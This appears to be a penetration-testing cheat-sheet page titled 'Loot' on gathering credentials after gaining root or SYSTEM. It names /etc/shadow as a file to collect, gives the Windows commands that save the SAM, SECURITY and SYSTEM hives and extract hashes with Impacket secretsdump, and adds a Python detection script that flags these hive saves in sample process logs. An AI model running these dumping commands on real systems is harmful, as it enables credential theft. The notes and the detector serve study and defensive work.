Loot

Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑

Linux

Dump users and passwords

Collect files on target
/etc/passwd
/etc/shadow

Windows

Dump SAM

Collect files on target
reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system
Then extract the hashes from them offline using Impacket's secretsdump
secretsdump.py -sam sam -security security -system system LOCAL
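On the detection side, the three `reg save` commands above leave process-creation records (for example Security event 4688 with command-line auditing, or Sysmon event ID 1). The following is an added example, not part of the original notes: it flags hive saves in such command lines and raises the severity when SYSTEM is saved together with SAM or SECURITY. The host names, users and event tuples are constructed sample data, and `hive_in` and `triage` are hypothetical helper names.

```python
import re
from collections import defaultdict

# Matches reg.exe save/export of the whole SAM, SECURITY or SYSTEM hive under HKLM.
# The lookahead rejects subkey saves such as hklm\system\CurrentControlSet.
HIVE_DUMP = re.compile(
    r'\breg(?:\.exe)?"?\s+(?:save|export)\s+"?'
    r'(?:hklm|hkey_local_machine)\\(sam|security|system)(?=["\s]|$)',
    re.IGNORECASE,
)

# Constructed process-creation records: (host, user, command line).
SAMPLE_EVENTS = [
    ("WS01", "CORP\\alice", r"reg save hklm\sam .\sam"),
    ("WS01", "CORP\\alice", r"reg save hklm\security .\security"),
    ("WS01", "CORP\\alice", r"reg save hklm\system .\system"),
    ("WS02", "CORP\\bob",
     r'"C:\Windows\System32\reg.exe" SAVE HKEY_LOCAL_MACHINE\SYSTEM C:\bk\sys.hiv /y'),
    ("WS02", "CORP\\bob", r"reg query hklm\system\CurrentControlSet\Services"),
    ("WS03", "CORP\\carol", r"reg save hklm\software\Vendor .\vendor"),
]


def hive_in(cmdline):
    """Return the hive name (SAM, SECURITY, SYSTEM) saved by this command, or None."""
    match = HIVE_DUMP.search(cmdline)
    return match.group(1).upper() if match else None


def triage(events):
    """Group hive saves per (host, user) and assign a severity to each group."""
    hives = defaultdict(set)
    for host, user, cmdline in events:
        hive = hive_in(cmdline)
        if hive:
            hives[(host, user)].add(hive)
    alerts = {}
    for key, seen in hives.items():
        # SAM and SECURITY are only decryptable with the boot key from SYSTEM,
        # so SYSTEM plus either of them is the complete credential-dump set.
        complete = "SYSTEM" in seen and bool(seen & {"SAM", "SECURITY"})
        alerts[key] = "high" if complete else "medium"
    return alerts


if __name__ == "__main__":
    for (host, user), severity in triage(SAMPLE_EVENTS).items():
        print(f"{severity:6} {host} {user}")
```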

Dump NTDS (DC)

By default, the Ntds.dit file is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.
TODO (see /13-misc/impacket.md)